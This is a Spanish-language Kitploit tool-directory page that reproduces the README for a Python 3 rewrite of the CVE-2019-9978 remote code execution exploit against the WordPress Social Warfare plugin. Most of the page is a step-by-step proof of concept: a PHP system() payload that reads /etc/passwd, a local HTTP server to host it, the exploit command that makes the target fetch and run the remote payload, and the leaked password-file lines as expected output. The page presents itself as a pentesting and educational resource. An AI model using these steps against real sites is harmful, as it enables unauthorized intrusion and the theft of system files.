Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9978 — Una vulnerabilidad de ejecución remota de código (RCE) en el plugin Social Warfare para WordPress, que afecta a versiones anteriores a la 3.5.3. | Kitploit
Herramientas/GitHubGitHub/echoosso/cve-2019-9978
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubechoosso/cve-2019-9978

CVE-2019-9978

Una vulnerabilidad de ejecución remota de código (RCE) en el plugin Social Warfare para WordPress, que afecta a versiones anteriores a la 3.5.3.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9978 - RCE en el Plugin Social Warfare de WordPress < 3.5.3

Una vulnerabilidad de Ejecución Remota de Código (RCE) en el plugin Social Warfare para WordPress, que afecta a todas las versiones anteriores a 3.5.3.


💡 Motivación

El exploit público original fue escrito en una versión obsoleta de Python y ya no funciona correctamente en entornos modernos.
Reescribí el exploit para que sea totalmente compatible con Python 3, haciéndolo más fácil de usar, entender e integrar en herramientas modernas.


Prueba de Concepto (PoC)

✅ Paso 1 – Crear el Payload

Crea un archivo llamado payload.txt con el siguiente contenido:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ Paso 2 – Iniciar un Servidor HTTP de Python

Usa Python para servir tu payload:

root@kitploit:~
python3 -m http.server 8000

Esto hará que tu payload.txt sea accesible en:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ Paso 3 – Ejecutar el Exploit

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

Salida Esperada

Si el objetivo es vulnerable, recibirás una salida similar a:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Capturas de Pantalla

El Servidor HTTP Recibe la Solicitud

http-server

Ejecución Exitosa del Exploit

exploit

Contenido del Archivo Payload

payload


🧬 Si este payload te alegró el día, una ⭐ haría el mío.

Detalles Técnicos

  • Plugin: Social Warfare
  • Versiones Afectadas: < 3.5.3
  • CVE: CVE-2019-9978
  • Tipo de Vulnerabilidad: Ejecución Remota de Código (RCE)
  • Autor Original: @hash3liZer
  • Investigador: Luka Sikic

Créditos

  • Autor del Exploit: @hash3liZer
  • Reelaboración en Python 3: @echosso

⚠️ Descargo de responsabilidad: Este repositorio es solo para fines educativos y de pruebas éticas.
El uso no autorizado de este exploit contra sistemas que no posees está estrictamente prohibido.

Descargar herramienta